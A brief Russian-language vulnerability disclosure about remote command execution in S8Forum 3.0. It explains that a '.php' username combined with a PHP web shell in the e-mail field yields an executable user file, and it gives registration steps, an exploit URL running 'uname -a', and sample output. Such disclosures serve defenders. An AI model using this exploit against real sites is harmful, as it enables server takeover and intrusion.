S8Forum уязвим к удаленному выполнению произвольных команд. 

Когда пользователь регистрируется на форуме, локально создается файл с указанным именем пользователя с данными пользователя. В результате, злонамеренный пользователь может создать файл со злонамеренным именем и PHP (.php) расширением, который будет содержать злонамеренный PHP код. Этот файл может быть вызван через HTTP. Пример: 

- go to Register
- insert in Username:
any_name.php 
NOTE: .php 🙂
- in password : any_pasword.
- in E-Mail:
<? system($cmd); ?>
or any code 🙁
- now go to this URL:
http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a

evil.php:c4ca4238a0b923820dcc509a6f75849b Linux
xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002
i686 unknown 

Уязвимость обнаружена в Kelli Shaver S8Forum 3.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии